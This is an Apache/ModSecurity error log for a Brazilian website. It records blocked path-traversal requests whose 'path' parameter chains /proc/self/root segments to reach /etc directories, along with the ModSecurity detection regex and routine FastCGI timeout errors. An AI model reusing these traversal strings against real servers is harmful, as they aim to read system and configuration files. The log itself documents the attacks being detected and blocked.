https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:39:26.236742 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.241.31:42900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf3qt8Nd0UC_OcbVHTnAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:39:27.732436 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:43332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf33Ik7brgkOH-rIWVDQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:39:43.049822 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:39:45.075115 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.243.128:60194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf8fPqhzTj3BvfDX-RtgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:39:47.075921 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.128:34518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf86t8Nd0UC_OcbVHTqQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:40:05.135180 2026] [proxy_fcgi:error] [pid 29151:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50232] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:40:15.805007 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.243.128:34524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgD3Ik7brgkOH-rIWVKwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:40:27.151603 2026] [proxy_fcgi:error] [pid 7437:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50576] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:40:49.130629 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50964] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:41:02.577898 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.128:41186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgPq4xEDsg_V3ESNZV1AAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:41:11.043163 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:41:33.049834 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:41:40.627108 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:43338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgZNY0UrI5A3LftIwHSQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:41:49.862914 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.243.128:36502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgbXIk7brgkOH-rIWVZQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:41:51.619045 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:55178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgbnIk7brgkOH-rIWVZwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:41:55.095488 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:38228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgc6BJNF7axNlVR0UihQAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:41:55.121797 2026] [proxy_fcgi:error] [pid 7004:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:42:05.958120 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:38234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgffPqhzTj3BvfDX-SJAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:42:17.145801 2026] [proxy_fcgi:error] [pid 6296:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:42:31.900920 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.243.128:56556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmglxj0p0SRWAqcjGGDdwAAAwM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:42:36.431162 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.243.128:49480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgnBj0p0SRWAqcjGGDegAAAxI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:42:39.125824 2026] [proxy_fcgi:error] [pid 7004:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52912] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:42:53.699195 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:38168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgrdY0UrI5A3LftIwHjgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:43:01.133786 2026] [proxy_fcgi:error] [pid 7004:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53370] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:43:04.667458 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:48890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmguNY0UrI5A3LftIwHlAAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:43:14.621582 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:54482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgwtY0UrI5A3LftIwHpAAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:43:19.920192 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.241.31:46386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmgx6t8Nd0UC_OcbVHT6QAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:43:23.057837 2026] [proxy_fcgi:error] [pid 6296:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:43:31.407356 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.241.31:48650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmg08U6Sx0TG1YjmQi5gQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:43:46.322322 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:43:52.837336 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:46756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmg6NY0UrI5A3LftIwH0AAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:44:00.809075 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.241.31:42668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmg8Kt8Nd0UC_OcbVHT_gAAAIk"], referer: 